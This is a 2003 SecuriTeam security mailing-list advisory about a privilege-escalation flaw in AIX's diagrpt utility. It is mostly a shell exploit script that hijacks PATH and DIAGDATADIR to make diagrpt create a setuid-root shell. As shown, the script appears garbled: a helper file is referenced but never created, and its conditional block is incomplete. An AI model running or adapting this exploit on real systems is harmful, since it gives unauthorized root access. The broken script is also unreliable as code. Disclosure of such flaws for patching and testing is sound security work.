[EXPL] Exploit Code Released for diagrpt Vulnerability
From: SecuriTeam (support_at_securiteam.com)
To: firstname.lastname@example.org Date: 11 Jun 2003 18:33:41 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Latest attack techniques.
You're a pen tester, but is google.com still your R&D team?
Now you can get trustworthy commercial-grade exploits and the latest
techniques from a world-class research group.
Learn more at http://www.coresecurity.com/promos/sit_e1,
or call 617-399-6980
- - - - - - - - -
Exploit Code Released for diagrpt Vulnerability
When 'diagrpt' executes, it relies on an environment variable to locate
another utility that it executes. This utility is executed by 'diagrpt' as
root. An attacker can gain root privileges by having 'diagrpt' execute a
malicious program of the same name in a directory under their control. The
following exploit code can be used to test your system for the mentioned
# FileName: x_diagrpt.sh
# Exploit diagrpt of Aix4.x & 5L to get a uid=0 shell.
# Tested : on Aix4.3.3 & Aix5.1.
# Author : email@example.com
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-23
# Announce: use as your owner risk!
# Note :
# It does not work on all versions of tsm command.
# Use this command to test if your version can exploit or not :
# bash$ strings /usr/lpp/diagnostics/bin/diagrpt |grep cat
# cat %s <--- here ! have the bug !!! can exploit!
cd /tmp ; mkdir .ex$$ ; cd .ex$$
PATH=/tmp/.ex$$:$PATH ; export PATH
cp /bin/ksh ./kfsh
chown root ./kfsh
chmod 777 ./kfsh
chmod u+s ./kfsh
chmod a+x cat
DIAGDATADIR=/tmp/.ex$$ ; export DIAGDATADIR
/usr/lpp/diagnostics/bin/diagrpt -o 010101
stty intr '^C' erase '^H' eof '^D' eol '^@'
if [ -e ./kfsh ] ;then
ls -l ./kfsh
echo "Exploit ok ! Use this command to get a uid=0 shell :"
echo '/usr/bin/syscall setreuid 0 0 \; execve "/bin/sh" '
echo "Exploit false !!!!"
cd /tmp ; /bin/rm -Rf /tmp/.ex$$ ;cd $O_DIR
The information has been provided by <mailto:firstname.lastname@example.org>
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: email@example.com
In order to subscribe to the mailing list, simply forward this email to: firstname.lastname@example.org
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.